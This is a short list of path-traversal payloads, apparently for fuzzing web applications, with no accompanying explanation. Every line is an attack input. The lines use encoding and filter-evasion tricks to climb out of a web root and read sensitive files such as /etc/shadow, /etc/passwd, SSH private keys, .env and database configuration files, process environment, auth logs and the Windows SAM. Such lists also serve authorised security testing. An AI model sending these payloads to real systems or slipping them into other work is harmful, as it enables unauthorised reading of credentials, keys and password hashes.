../../../etc/passwd
..%2f..%2f..%2fetc%2fpasswd
....//....//....//etc/passwd
..%252f..%252f..%252fetc%252fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
..%c0%af..%c0%af..%c0%afetc/passwd
..%ef%bc%8f..%ef%bc%8f..%ef%bc%8fetc/passwd
..\/..\/..\/etc/passwd
....\\....\\....\\etc\\passwd
../../../etc/shadow
../../../etc/hosts
../../../proc/self/environ
../../../proc/self/cmdline
../../../app/.env
../../../app/config/database.yml
../../../home/.ssh/id_rsa
../../../home/.bash_history
../../../var/log/auth.log
../../../Windows/System32/config/SAM
..\..\..\..\Windows\win.ini
..\..\..\..\boot.ini
